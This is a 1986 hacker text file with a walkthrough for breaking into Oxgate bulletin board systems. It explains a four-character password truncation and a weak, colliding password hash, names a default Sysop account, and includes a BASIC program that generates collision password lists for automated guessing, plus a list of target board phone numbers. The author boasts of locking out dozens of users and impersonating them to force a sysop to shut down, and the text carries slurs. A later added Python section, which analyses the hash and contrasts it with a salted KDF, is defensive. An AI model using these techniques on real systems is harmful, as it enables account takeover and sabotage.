
[!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!]
[!]                                                                     [!]
[!]          Hacking the Oxgate Public Bulletin Board System            [!]
[!]                                                                     [!]
[!]                Written by: The 0mega & Lord Vision                  [!]
[!]                 Infinity's Edge -:- 805/683-2725                    [!]
[!]                     10 Megz.  300/1200 baud                         [!]
[!]                                                                     [!]
[!]                    Call these cool boards:                          [!]
[!]                                                                     [!]
[!]                       The Cartel..........206/825-6236              [!]
[!]                 Metal Land South..........404/327-2327              [!]
[!]              Terrapin Station AE..........505/865-0883              [!]
[!]                                                                     [!]
[!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!]

Written Sept. 20, 1986.

     Why am I writing a file on hacking a measly public Bulletin Board System?
There are a few reasons:  Oxgate is probably one of the more popular Public
Bulletin Board Systems for CP/M and MS-DOS systems that is cheap (it supersedes
the archaic RBBS).  Second, I am probably the only person, or one of the few
people who knows the ins and outs of this system and can say that Oxgate will
be the easiest system you will ever hack (providing you know a few key
secrets).  Thirdly, I owe the Author of the program, Paul Traina, something
special.

     A couple of years ago, I was a co-sysop on one of these Oxgate systems,
and did some modding to the Source Code for the Sysop, so I have had the chance
to get to know the system from firsthand experience, and as a Sysop.  After a
while, Traina decided to be an asshole and try and fuck me over a few times
(he's a Jehovah's Witness, what can you expect?)  I'm surprised I haven't
contracted AIDS yet.  But, as it turned out, Traina liked my modds so much, he
decided to snake them from me and put them into his newer source code and
market his program (Oxgate ver. 6).  So for a few reasons, I've decided to
write this file - for informational purposes only, of course.  All the usual
disclaimers apply.  I will assume that you, the reader, have a brain of your
own and are not influenced by subliminal messages in Text files such as these.

SYSTEM OVERVIEW:

     The Oxgate system is mainly based on CP/M systems.  Oxgate also tends to
be the next step up for Sysops running RBBS, RCP/M systems.  At the end of this
article, I will try and list as many of the Oxgate Systems nationally as I can
find.  I'm sure you can find a more extensive list of other Oxgates off of one
of the systems I list.  I will assume some knowledge on the reader's part on
CP/M systems, but I will try and explain as much as I can along the way.

     The Program is divided into 3 separate modules, namely: OXENTR, OXGATE,
and OXEDIT.  OXENTR is the main login program, which accepts password,
username, prints any announcements and goes to OXGATE.  OXGATE is the main BBS
program, which does all the user functions and takes care of the message bases.
OXEDIT is a Sysop utility which allows editing users, masking sub-boards the
user can access, etc.  

     If you do not understand the following descriptions, then you can come back
to them later, after I explain how to get into the CP/M operating System.

     The CP/M system is usually subdivided thusly: 2 areas (or drives), A>, and
B>, each divided into 15 sub-areas, A0> through A14>, and B0> through B14>. All
Sysop utilities will be found either on A14> or B14>.  You enter these areas
simply by typing the Area Name followed by a colon (and a RETURN), for example
"B14:" or "A6:".  Most of the time, the OXGATE will allow the user to drop into
the CP/M operating system, in order to upload/download, etc.  The Normal user
can usually access A0> through A6>, and some lower B> areas.  A0> will contain
the OXGATE.COM file so that a user can return to OXGATE from the Operating
System (by typing "OXGATE"). A14> will usually contain OXENTR to allow the
Sysop (or remote-Sysop) to re-login as another user without having to drop
carrier.  The OXEDIT utility is also to be found in this area.

     At the heart of controlling the CP/M access is a small daemon program
called WHEEL.  WHEEL will watch what areas you try to access and determine
whether you can get in or not.  If a user has the correct password, he can
access all of the areas, change the WHEEL Password, etc.  Once the WHEEL is set
to allow access to the upper areas, you are Sysop, with the control to access
the ERAse command, the OXEDIT utilities, and anything else your heart desires.
WHEEL is a COM file that may be called from any area, and you will usually see
it in A0>.  It may be renamed, of course, so if you are hacking in CP/M, be
aware of that.  To use WHEEL, you simply type "WHEEL password", and the WHEEL
will be set (upon being given the correct password) to let you in to the
restricted areas.

BBS OVERVIEW AND HACKING INTO IT:

     As boring as Oxgates are to me (especially for the countless 'daim
bramaged' users that seem to flock to them), they seem to be popular.  In some
cases, the Sysop will restrict the system so that you cannot gain an account
automatically; you must log on, answer the questions, and then send an SASE.
This tends to discourage users from creating loser accounts, or being 'Twits'
as the term goes (comp: Luser, Ruggie, Dick...)  There is one big disadvantage
to the SASE method that Sysops do not realize, and that I have used severely to
my advantage (I was able to shut down, permanently, an Oxgate and force the
Sysop to 'retire'). So, the only way to get in is to hack in.

     When you log on, it will ask for a user name, however, a user # can be
entered here, as well.  Then it will ask for a password (if that account
exists).  It will let you type a password with an 80 char. limit, however, the
system *ONLY RECOGNIZES THE FIRST FOUR (4) CHARACTERS*.  99% of the users are
ignorant of this, and tend to think if they type in 7 letters, they are more
safe than if they type 5 letters for their password.  And, 99% of the users, in
my experience, use only alphabetical characters.  That narrows the combinations
down considerably to a mere 456,976 (26^4).  You could sit there and try them
all, but there is another little known fact about the way Oxgate saves
passwords that will help considerably.  Namely this:  Traina decided to get
clever (ooh!) and encrypt (tricky!) user passwords with a one-way function (a
one-way function in that you cannot derive the original password from the
encrypted one, and you are not meant to.) into a 4 digit number, representative
of the password.  Even when a Sysop uses OXEDIT to look at a user, all he will
see for a password is that 4 digit number.  But, unfortunately for Traina and
the Oxgate Sysops, the way that a password is encrypted, there are 4 other
possible combinations you can type for a password that will be encrypted

examples] "CAQZ", "BAMZ", "BABE", etc, would also be encrypted the same as
"FUCK" is.  As far as Oxgate is concerned all those are the same password.  So
in reality, if a user's password is all alphabetic characters, *THERE ARE ONLY
251 COMBINATIONS* you will have to go through before you get in.  Hayes
Hackamatic with PPP or Intellihacker, each given a textfile with the 251
combinations will easily hack in!  I can hand hack an account in 50 minutes,
max.  And *ALL* Oxgates suffer from this important weakness.  When I was
hacking, the Sysops finally got a clue on life and changed their passwords to
numbers and other characters which make the number of combinations increase,
because they can be combined with alphabetic characters as well.  But, that
didn't stop me.  With the algorithm I will show later on, and a program, you
can generate all the combinations and feed them to your auto-hacker.  The BBS
gives you 3 tries before hanging up.

     If you want to get in as the Sysop, you must, of course, find out his
name.  Just log on and look around, if you can.  All Oxgates have 1 account at
least that will always be there.  The name is, of course, Paul Traina.  The
passwords differ from Oxgate to Oxgate (they are hard-coded into the program),
but the Paul Traina account is *ALWAYS* a Sysop.  A few other important notes:
The Newer Oxgates (version 6 and higher) are compiled; that is to say, the
Sysop *DOES NOT* have the source code, and *CANNOT* alter the BBS in any way
from what it already is, which means he can't put extra programs in there to
discourage hacking.  Paul is really protective about his source code,
especially since the New Oxgates have a backdoor - and that backdoor cancels
the WHEEL allowing him access to all user areas, as well.  I don't,
unfortunately, know what it is or how it works.  Also, (I'm reasonably sure)
the new Oxgates keep track of hack attempts, and the passwords tried - I wrote
the routine.  

     The way I brought a System down was simple.  After hacking a system, (the
Sysop noticed through the hack log) the Sysop instigated the SASE, thinking I
could not gain anymore accounts.  Of course, he wanted to discourage all but
real interested users.  I had, thanks mostly to Rebel, a nearly complete list
of every password used by almost every user in the area.  Since the Lusers
(ahem, I mean 'Users') never change their passwords, it was simple.  I broke
into about 30-45 user accounts and changed their passwords so they could not
log on, then left the accounts to rot.  After a while, it seemed to the Sysop
that nobody was calling anymore, and the user could not even log on to leave a
complaint, and was probably too pissed or lazy to send another SASE.  After
that got boring, I started to put words into users' mouths, so to speak.
Pissed and unable to do anything about all this, the Sysop shut down.

     It should be more than easy for you to break in as the Sysop (or anybody
you want).  There, you can read all private messages, kill messages, access all
sub-boards (16 max) or whatever, but to really have System control, you need to
go to [C]pm (or [J]ump) and be able to gain access to the higher areas.  Once
you can do that, you will be able to use the ERAse command, and just do "ERA

OXEDIT and edit users.  But your real hacking task is in hacking the WHEEL
program.  Once you get the WHEEL password, you will be able to figure out how
to set the password to whatever you want.


[>] Program to Hack Passwords. [<]

/* Alphabetic Passwords range from 2600-3601 */
/* Modify the Range of the Loop in Line 120  */
/* To experiment with other combinations     */

  5  REM THANKS TO MR. AMIGAHEAD FOR HELPING WITH
  6  REM THE ALGORITHM AND THIS PROGRAM.

100  DIM A$(4):D$ =  CHR$ (4):CO = 0
110  HOME : VTAB 12: PRINT  SPC( 15);"HACKING...
115  PRINT D$;"OPEN HACK.FILE": PRINT D$;"WRITE HACK.FILE

116  REM  "STEP 4" IN LINE 120 TO SKIP 4 OF SAME COMBINATION
120  FOR C = 2600 TO 3601 STEP 4
140  FOR X = 1 TO 4:A$(X) = "A": NEXT 
200  REM  ATTACK!
210  GOSUB 5000
220  IF PW < C THEN  GOSUB 1000: GOTO 210
250  FOR X = 1 TO 4: PRINT A$(X);: NEXT 
260 CO = CO + 1: PRINT " ";: IF CO = 10 THEN  PRINT :CO = 0
270  NEXT C: PRINT D$;"CLOSE": VTAB 12: PRINT SPC( 15);"FINISHED...";CHR$ ( 7)
280  END
 
1000  REM  INC A$(4)
1010 A$(4) =  CHR$ ( ASC (A$(4)) + 1)
1020  GOSUB 5000
1030  IF  ASC (A$(4)) <  = 90 AND PW < C THEN  RETURN
 
2000  REM  DEC A$(4), INC A$(3)
2010 A$(4) =  CHR$ ( ASC (A$(4)) - 1)
2020 A$(3) =  CHR$ ( ASC (A$(3)) + 1)
2030  GOSUB 5000
2040  IF  ASC (A$(3)) <  = 90 AND PW < C THEN  RETURN
 
3000  REM  DEC A$(3), INC A$(2)
3010 A$(3) =  CHR$ ( ASC (A$(3)) - 1)
3020 A$(2) =  CHR$ ( ASC (A$(2)) + 1)
3030  GOSUB 5000
3040  IF  ASC (A$(2)) <  = 90 AND PW < C THEN  RETURN
 
4000  REM  DEC A$(2), INC A$(1)
4010 A$(2) =  CHR$ ( ASC (A$(2)) - 1)
4020 A$(1) =  CHR$ ( ASC (A$(1)) + 1)
4030  IF  ASC (A$(1)) <  = 90 THEN  RETURN 

5000  REM  EVALUATE PW - THE ENCRYPTION ALGORITHM FOLLOWS
5005  REM  THAT CONVERTS AN ARRAY/4 CHAR STRING TO 4 DIGIT #.
5010 PW = 0
5020  FOR X = 1 TO 4:PW = PW +  ASC (A$(X)) * X * 4: NEXT X
5030  RETURN 
5040 END
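
Added example (not part of the original file, and not Oxgate's own code): a Python sketch that measures the storage weakness described above, using the weighted sum from line 5020 of the listing, and sets it beside a salted, slow KDF that keeps the whole password. Function names, the sample passwords and the PBKDF2 parameters are assumptions; passwords are taken to be uppercase A-Z and at least four characters long.

```python
import hashlib
import hmac
import os
from collections import Counter
from itertools import product
from string import ascii_uppercase

def oxgate_digest(password: str) -> int:
    """Line 5020 of the listing: sum of ASC(char) * position * 4 over the
    first four characters; anything after the fourth is ignored."""
    return sum(ord(ch) * pos * 4 for pos, ch in enumerate(password[:4], start=1))

def digest_histogram() -> Counter:
    """Count how many 4-letter uppercase passwords share each stored value."""
    return Counter(oxgate_digest("".join(p))
                   for p in product(ascii_uppercase, repeat=4))

# Hardened contrast (not from the page): per-user salt, slow KDF, full input.
ITERATIONS = 200_000  # assumed work factor for this sketch

def kdf_enroll(password: str) -> tuple[bytes, bytes]:
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

def kdf_verify(password: str, salt: bytes, stored: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, stored)

if __name__ == "__main__":
    hist = digest_histogram()
    print("keyspace:", sum(hist.values()), "distinct stored values:", len(hist))
    print("range:", min(hist), "to", max(hist),
          "largest collision class:", max(hist.values()))
    # Constructed sample passwords that collapse to one stored value.
    print(oxgate_digest("BABE"), oxgate_digest("FABD"), oxgate_digest("BABEXYZ1"))
    # Under the KDF, only the enrolled password verifies.
    salt, stored = kdf_enroll("BABEXYZ1")
    print(kdf_verify("BABEXYZ1", salt, stored), kdf_verify("FABD", salt, stored))
```

The histogram shows why the stored number protects so little: the whole alphabetic keyspace lands on a few hundred values, so password length and letter choice add almost nothing once the sum is the only thing checked.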


[>] LIST OF 251 COMBINATIONS FOR ALPHABETIC PW [<]

/* Produced from above Program */



[>] List of Oxgates by Area Code [<]

RCP/M Oxgate 002, Milpitas, CA          408/263-2588
RCP/M Oxgate 012, San Jose, CA          408/378-7474
RCP/M Oxgate-DbaseII, Campbell, CA      408/378-8733
RCP/M Oxgate 001, Saratoga, CA          408/354-5934
RCP/M Oxgate 007, Grafton, VA           804/898-7493
RCP/M Oxgate    , Santa Barbara, CA     805/682-3486
RCP/M Oxgate    , Goleta, CA            805/964-4115

I know there aren't many listed here (obviously, there are at least 12), but in
my rush to finish this article, those were all the ones I could find.  Try
downloading a list of Oxgates off of one of these systems.  If you have any
comments, or questions, you can leave them to The 0mega in [F]eedback on
Infinity's Edge -:- 805/683-2725.

                         The [>]mega
                         Lord Vision
                      Electronic Rebel